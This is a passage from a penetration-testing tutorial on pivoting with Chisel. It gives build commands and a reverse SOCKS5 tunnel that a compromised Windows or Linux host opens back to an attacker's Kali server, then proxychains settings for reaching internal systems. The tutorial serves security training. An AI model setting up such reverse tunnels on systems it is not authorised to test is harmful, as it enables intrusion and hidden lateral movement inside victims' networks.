Chisel

The methods discussed in the previous sections either are restricted to creating a pivot to access a single port/service or create dynamic port forwarding when the intermediate machine(compromised one) is a Linux machine using proxy chains and SSH.

Chisel comes in handy when the intermediate system is Windows and it even works equally great with a Linux system.

Building Chisel

Chisel source code is available from Github and it can be be downloaded to be compiled for Windows or Linux. Here are the steps to follow to build chisel.

Clone the Chisel library from the following link,

sudo git clone https://github.com/jpillora/chisel.git /opt/chisel
cd /opt/chisel

Next we compile it for Windows using Go Lang. If you don't have Go Lang you can use the following link to get it installed,

Use the following command to create an executable,

GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

Next we can use Go Lang again to build for Linux using the following command,

go build -ldflags="-s -w" .

Download Binary

If you are having trouble building it yourself, then the executables can be downloaded from the following link,

Creating a Tunnel

The following commands are to create dynamic port forwarding meaning with this tunnel you will be able to access any system and any port through proxychains and Chisel.

On the attacker system (Kali),

./chisel server -p 8080 --socks5 --reverse

Don't forget to transfer the binary to the target system,

chisel client 192.168.49.100:8080 R:socks

Make the following changes in the proxychains config file, which can be located in "/etc/proxychains.conf" or "/etc/proxychains4.conf"(config filename could be different based on the version),

[ProxyList]
socks5 127.0.0.1 1080

Now you can test connecting to any system that you like using proxychains,

proxychains -q telnet 192.178.100.100 80